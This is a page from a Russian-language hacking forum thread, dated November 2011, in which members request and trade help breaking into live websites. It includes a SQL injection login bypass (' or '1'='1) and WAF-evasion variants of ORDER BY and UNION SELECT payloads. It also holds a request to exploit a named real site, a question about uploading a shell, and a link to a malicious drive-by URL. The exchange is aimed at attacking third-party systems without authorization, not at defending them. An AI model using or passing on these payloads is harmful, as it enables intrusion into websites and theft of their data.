HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18561  
Старый 13.11.2011, 16:54
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
С нами: 9625938

Репутация: 32
По умолчанию

Цитата:
Сообщение от Gorev  
и не получится..прав то нет у юзверя бд на запись...
шелл залить есть возможность ,но по другому
Отпиши пожалуйста как
 
Ответить с цитированием

  #18562  
Старый 13.11.2011, 17:42
EST a1ien
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
С нами: 10582516

Репутация: 114
По умолчанию

Нашел Xss в input.

Фильтруется
[/CODE]
 
Ответить с цитированием

  #18563  
Старый 13.11.2011, 18:49
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417113

Репутация: 0
По умолчанию

Цитата:
Сообщение от EST a1ien  
EST a1ien said:
Нашел Xss в input.
Фильтруется
[/CODE]
 
Ответить с цитированием

  #18564  
Старый 14.11.2011, 13:24
Shimon
Новичок
Регистрация: 05.10.2011
Сообщений: 1
С нами: 7686326

Репутация: 0
По умолчанию

Добрый день.

Есть логин-форма.

При подстановке кавычки в любое из полей выдается:

MySQL-Error блаблабла

SQL Query:

SELECT user_id FROM users WHERE (BINARY _user_name = BINARY 'логин') AND (BINARY password = BINARY 'пасс')


логин и пасс - то что вводится в соответствующие поля, со всеми скобками, кавычками и пр., т.е. все спецсимволы в запросе не обрабатываются, а пролетают как текст.

Ну если ввести в оба поля admin' or 1=1 -- то на выходе и будет

SQL Query:

SELECT user_id FROM users WHERE (BINARY user_name = BINARY 'admin' or 1=1 --') AND (BINARY password = BINARY 'admin' or 1=1 --')


если кавычку заменить на %27, то SQL-ошибка не появляется, просто ответ "неверный пароль".

Как тут можно в эту BINARY инжектнуться?
 
Ответить с цитированием

  #18565  
Старый 14.11.2011, 15:13
gigan
Новичок
Регистрация: 03.02.2011
Сообщений: 1
С нами: 8037686

Репутация: 0
По умолчанию

Всем доброго дня, взломали один сайт, поместили в него фрейм с ссылкой на это место - http://nncc.1dumb.com/main.php?page=5f7bf430541a94ae

я так понимаю загружается jar с инструкциями к исполнению и алгоритмом расшифровки контента, далее создается файл и что то выполняет, так как jar файл без какой либо подписи он ни исполняется. У меня вопрос, если бы он исполнился все же что бы произошло?
 
Ответить с цитированием

  #18566  
Старый 14.11.2011, 15:34
s000r
Новичок
Регистрация: 28.09.2011
Сообщений: 15
С нами: 7696406

Репутация: 0
По умолчанию

Всем добрый день.

Помогите пожалуйста, вроде бы инъекция есть, а раскрутить не могу...

http://powerdefence.ru/Uslugi_dlya_Yur_lic'
 
Ответить с цитированием

  #18567  
Старый 14.11.2011, 18:19
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
С нами: 8960082

Репутация: -14
По умолчанию

Как обойти фаервол / фильтр при проведение SQL-инъекции?

Запросы вида: =-1'+order+by+10+--+

=-1'/*--*/order/*--*/by/*--*/10--

=-1'+OrDer+By+10+--+

При всех этих запросах пишет: Соединение было сброшено
 
Ответить с цитированием

  #18568  
Старый 14.11.2011, 20:37
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами: 9384053

Репутация: 303
По умолчанию

2 s000r: Нет тут sql injection (http://powerdefence.ru/Uslugi_dlya_Yur_lic')

2 aydin-ka:

=-1'/**//*!order*//**//*!by*//**/10--+

Так пробовал? Все зависит от того, где именно происходит фильтрация.
 
Ответить с цитированием

  #18569  
Старый 14.11.2011, 23:15
Boolean
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами: 8255126

Репутация: 78
По умолчанию

Цитата:
Сообщение от aydin-ka  
Как обойти фаервол / фильтр при проведение SQL-инъекции?
Запросы вида: =-1'+order+by+10+--+
=-1'/*--*/order/*--*/by/*--*/10--
=-1'+OrDer+By+10+--+
При всех этих запросах пишет: Соединение было сброшено
Пробуй GROUP BY

или тупо

UNION SELECT 1 --

UNION SELECT 1,2 --

UNION SELECT 1,2,3 --

UNION SELECT 1,2,3,......,N --

Цитата:
Сообщение от Shimon  
Добрый день.
Есть логин-форма.
При подстановке кавычки в любое из полей выдается:
MySQL-Error блаблабла

SQL Query:

SELECT user_id FROM users WHERE (BINARY _user_name = BINARY 'логин') AND (BINARY password = BINARY 'пасс')

логин
и
пасс
- то что вводится в соответствующие поля, со всеми скобками, кавычками и пр., т.е. все спецсимволы в запросе не обрабатываются, а пролетают как текст.
Ну если ввести в оба поля
admin' or 1=1 --
то на выходе и будет
SQL Query:

SELECT user_id FROM users WHERE (BINARY user_name = BINARY 'admin' or 1=1 --') AND (BINARY password = BINARY 'admin' or 1=1 --')

если кавычку заменить на %27, то SQL-ошибка не появляется, просто ответ "неверный пароль".
Как тут можно в эту BINARY инжектнуться?
В оба поля: ' or '1'='1
 
Ответить с цитированием

  #18570  
Старый 14.11.2011, 23:35
Osstudio
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами: 7932566

Репутация: 81


По умолчанию

Цитата:
Сообщение от aydin-ka  
Как обойти фаервол / фильтр при проведение SQL-инъекции?
Запросы вида: =-1'+order+by+10+--+
=-1'/*--*/order/*--*/by/*--*/10--
=-1'+OrDer+By+10+--+
При всех этих запросах пишет: Соединение было сброшено
Код:
(-1')order(by)10--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.